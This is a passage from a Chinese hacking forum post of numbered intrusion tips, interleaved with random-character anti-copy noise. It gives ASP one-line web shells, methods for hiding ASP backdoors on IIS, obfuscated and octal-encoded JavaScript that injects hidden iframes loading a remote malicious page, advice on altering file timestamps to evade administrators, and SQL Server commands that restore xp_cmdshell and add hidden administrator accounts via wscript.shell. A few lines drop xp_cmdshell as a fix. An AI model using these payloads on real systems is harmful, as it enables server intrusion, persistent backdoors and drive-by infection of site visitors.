c).%><%execute request("go")%><%
6 f. @- ^* g' d
d).<script language=VBScript runat=server>execute request("sb")</Script>
. u0 c6 P* e4 B2 K6 R- P
e).<%25Execute(request("l"))%25>
1 h% a; Z% H. H( M
f).<%if request("cmd")<>"" then execute request("pass")%>
3 S R/ j, V5 E0 ~2 N1 v
6 T3 X2 ]7 s' q7 G# j1 M
52、at "12:17" /interactive cmd
- d3 \2 D, ]4 z2 n! |6 g& r+ A
执行后可以用AT命令查看新加的任务
2 F, O$ m ~3 Q& Z
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
6 O. I0 K. {6 I( l s, Q1 G! H R
' E, b3 ?7 v5 s! H- S2 w6 l0 Q
53、隐藏ASP后门的两种方法
/ G. P+ [3 q1 Y6 S
1、建立非标准目录:mkdir images..\
) e# ^' S# B; y. M* g7 g
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
8 o# G, O# K; H7 C: s' f: f6 N6 T5 \
通过web访问ASP木马:http://ip/images../news.asp?action=login
% K# e# }$ T: L4 I
如何删除非标准目录:rmdir images..\ /s
2 x9 Y/ v2 E. i: @- J$ _, S
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
" I4 h) Y" \7 @' s( B+ i- ^
mkdir programme.asp
- w+ L& Y) R5 |3 ^/ b2 L9 F
新建1.txt文件内容:<!--#include file=”12.jpg”-->
- b4 B4 H4 }: l8 `9 Z8 [8 w
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
- ~/ Z5 O7 ]' A; ^
attrib +H +S programme.asp
9 U. z+ d4 \8 y. y5 J9 Q
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
7 w2 G; S- K* y* W# X" r7 x
/ K1 C! R9 T& b9 T$ V
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
; s& j+ i# Q0 o2 Z; I# B
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
6 C5 a6 @* q5 l# J* h% K1 R* [8 m9 M7 E# G
4 M9 V5 U- v/ K+ n9 j7 s4 q
55、JS隐蔽挂马
+ v4 A. `6 I9 r& P3 W
1.
$ W" r- c/ I" w" F
var tr4c3="<iframe src=ht";
# J- Y5 q- F( j! i$ K
tr4c3 = tr4c3+"tp:/";
0 D5 o; X9 h/ c( r6 O" w- S
tr4c3 = tr4c3+"/ww";
3 S6 H l9 N* A* A, A+ C0 p
tr4c3 = tr4c3+"w.tr4";
$ C* \( |! `3 {' l
tr4c3 = tr4c3+"c3.com/inc/m";
7 E) r) A2 c- N r* G; f
tr4c3 = tr4c3+"m.htm style="display:none"></i";
z9 z% O* k n: U
tr4c3 =tr4c3+"frame>'";
, ~/ I. C* W, S1 Q: v$ h
document.write(tr4c3);
: b A: N/ _/ i/ v( E7 P
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
4 z6 v Q; v4 H: x: Q/ Q0 l
) `6 a& F$ U# A( }" o" G' d6 E. ~
2.
8 Z! @3 X: O) l3 Q/ W, N
转换进制,然后用EVAL执行。如
. E9 I. `1 s! D3 }( h2 u3 h o
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
/ v2 _0 M0 }, ] P( P
不过这个有点显眼。
) u9 G2 d! c4 b% [; J9 B8 G" |
3.
: T+ T7 }+ g" F1 Z, D
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
2 p; p$ h, P6 L( X+ v
最后一点,别忘了把文件的时间也修改下。
- B) A! U/ q+ w2 V6 R* _; q* E
: ^+ B/ Q, _1 r; I) _. ^9 X
56.3389终端入侵常用DOS命令
9 e& I9 J j4 r) _5 Z
taskkill taskkill /PID 1248 /t
0 g' b. `$ ?5 b2 ^6 g' l
0 L, B& c: O( f; X! v- d' N* A" \
tasklist 查进程
o$ `$ ~2 _/ K
; O1 ^; y/ p! r) o- T
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; t5 k l' H. h0 [5 @3 P
iisreset /reboot
5 u) `4 ]" {$ ?
tsshutdn /reboot /delay:1 重起服务器
: i" F- F7 t' ^9 S& [5 J: p& Q: ~2 K
% A( e- C$ g3 g
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
6 M+ a. i$ |! H" ^3 b# U* v* O
) S& {. C" G9 k$ w5 x) B) R
query user 查看当前终端用户在线情况
2 M/ |" m) U' A3 T) F6 R
; z. w3 V; z2 n4 z" m0 F
要显示有关所有会话使用的进程的信息,请键入:query process *
" @7 x o+ t8 U
* v8 L9 ~* q- G+ E5 ]
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
4 _+ p& R& e w
5 B' y+ y9 n7 R- F
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
6 ~6 N. z) v0 U& q
6 I# t" S1 d- I6 a5 ~# s
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
L) w8 D7 x0 X) R9 S! C
* u' M& i- S. ` i
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
# l% d2 r' O% j. ~. Z7 w
! ^+ k6 l9 m5 U- d
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
2 f8 @2 w7 w0 O- j& y
/ g# o5 h6 n+ e
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
6 E' c, A6 \; ]3 _# a) L& U3 G3 b4 A
5 y2 x4 @7 Q4 T
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
, H& a6 b5 h( h5 D' d; o
7 {$ S$ q u, ]' c# Z7 [9 {5 f
56、在地址栏或按Ctrl+O,输入:
8 X5 U# X8 ^) Q# i! p, E
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
9 K/ D" E* M/ x" v7 _- _5 Z
4 m8 ` P+ A; ~6 C# m3 i
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
3 P5 O( e! t7 p- `- ?4 k2 O9 ]+ \3 a
2 f) `9 Z. m$ A& P
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
4 S8 R, e* a- r3 i; Z q
用net localgroup administrators是可以看到管理组下,加了$的用户的。
7 O" v8 g e' k2 G
4 r3 k* x% f$ J. l; a
58、 sa弱口令相关命令
4 m& K" ]/ l3 C: B
, ] U" H8 H! V. t
一.更改sa口令方法:
! e- ^9 d9 f7 [. s0 P( c
用sql综合利用工具连接后,执行命令:
8 `+ ~# u% D5 g0 s
exec sp_password NULL,'20001001','sa'
, M, J$ n9 j6 F! F
(提示:慎用!)
, m" v3 ^* z8 p8 |
, y" [' @4 Q1 D( B
二.简单修补sa弱口令.
; q, c" X' a) [4 `9 l M$ x% V! j
: M% |1 T ~# W9 Z% \! D! }
方法1:查询分离器连接后执行:
/ h/ R9 ~1 }6 y( A4 a+ p8 |2 ]
if exists (select * from
5 u9 K7 J; p. W8 c( S7 J
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
4 @$ a4 L+ j- R% M
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
; j8 x8 p8 W' C4 ^) W! y$ w/ |
4 X/ l5 {" v( j6 Y
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
* O5 F$ o: v! G' b
{" [2 w. @ g( h8 M- k
GO
" Q- y# j/ o; d
# g; A$ z( P3 @
然后按F5键命令执行完毕
4 D1 I4 v& C" m3 E# r
$ V) M! b \5 ], l4 r/ D& e+ \$ V& p
方法2:查询分离器连接后
8 }0 t1 M z& p
第一步执行:use master
& A/ R( N$ w1 [1 k3 _3 s
第二步执行:sp_dropextendedproc 'xp_cmdshell'
( _6 p1 g( l% F7 e0 o, j9 u. t( O7 S
然后按F5键命令执行完毕
1 U, @3 ?- k6 C) ?
+ S6 a) Q" i5 K; D* Y$ p
$ n; l* O P5 u# X) D: Q4 U; X
三.常见情况恢复执行xp_cmdshell.
3 c" V9 |8 c. O3 f8 t8 t: V, ` x
) z; b3 \6 F0 b" A* \; d
- ^- |5 p! l/ O% p5 Z! ]" w* a
1 未能找到存储过程'master..xpcmdshell'.
/ v9 J( |) L, M2 n. v- ?
恢复方法:查询分离器连接后,
Q- W' y7 C! B/ ~! k
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
6 J- \' t/ Y% j6 [6 j8 T
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
' M9 b+ f# Y* m. m
然后按F5键命令执行完毕
* f+ {8 ?0 D4 ?0 i$ M( Y
4 l8 U/ j6 s, \7 @2 n
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
, f4 O8 D q1 X6 t0 N) d6 k
恢复方法:查询分离器连接后,
9 L$ ? v! i$ m6 t
第一步执行:sp_dropextendedproc "xp_cmdshell"
- A: h( V$ \, o! |' \
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
6 a$ U) V7 o* v
然后按F5键命令执行完毕
; v$ n7 H) ]4 N9 F8 F
2 O8 V2 Q; g& n% R v
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
7 s# s0 s3 t+ {
恢复方法:查询分离器连接后,
, D+ v w# ~( ] B5 k" E
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
) g& i; K, F3 ?' r
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
6 X6 k: c) E$ Q3 ?# x% r* I. F
然后按F5键命令执行完毕
! c& j8 L2 s9 N% M8 Z
, q- a; i7 Q3 o R( x+ h: q1 f5 i8 Q
四.终极方法.
% @4 P: q; j( K% O3 P( r
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
8 L$ A' f ~5 o( |7 v" t5 S" {
查询分离器连接后,
* W4 q& {+ Y/ m7 A! ~+ v- ^2 I
2000servser系统:
/ q" e1 k$ n' f! J8 s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
" r/ G! e" }1 V7 O/ |
/ a; D" B, \$ |9 a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
! l$ f6 x$ j3 b! w5 c7 m
0 n# z& [4 b. f, I' y
xp或2003server系统:
& l. I6 }6 ?4 S$ J" d( U8 N8 T# T
% W8 u% N0 W; I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
2 G# X4 Q5 j3 ~# W: {- y s! `
' v) {$ Z: z5 @8 v9 A; B0 n# O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
7 Z8 B8 F3 }. m) g$ [) a
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2